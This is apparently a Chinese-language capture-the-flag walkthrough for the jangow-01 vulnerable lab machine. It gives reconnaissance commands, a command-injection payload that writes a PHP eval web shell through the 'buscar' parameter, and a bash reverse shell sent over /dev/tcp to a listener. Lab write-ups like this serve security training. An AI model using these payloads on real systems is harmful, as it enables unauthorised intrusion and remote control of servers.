jangow-01-1.0.1靶机攻略
1.进行配置,按住shift,在图一界面按e进去得到图二
.ro 替换为 rw signie init=/bin/bash
ctrl+x,ip a查看网卡信息,修改配置文件网卡信息
修改为如图所示内容后按shift+?然后输入wq点击回车退出,然后重启靶机
2.在kali中
arp-scan -l 扫描靶机ip
3.扫描端口信息
nmap -O 192.168.124.158
4.扫描目录信息
dirb http://192.168.124.158
5.访问靶机ip,点击site
6.进入如下页面,经过探索之后,点击buscar,发现页面的url可以传参
7.我们尝试输入一句话木马到1.php文件中
http://192.168.50.142/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]);' > 1.php
8.我们访问当前目录下的1.php,发现上传成功
http://192.168.124.158/site/1.php
9.复制1.php文件的绝对路径,去蚁剑尝试连接
连接成功!
10.去kali中打开443的监听
nc -lvvp 443
11.在蚂蚁剑中打开终端,输入反弹shell
bash -c 'bash -i >& /dev/tcp/192.168.124.128/443 0>&1'
12.成功在kali中监听!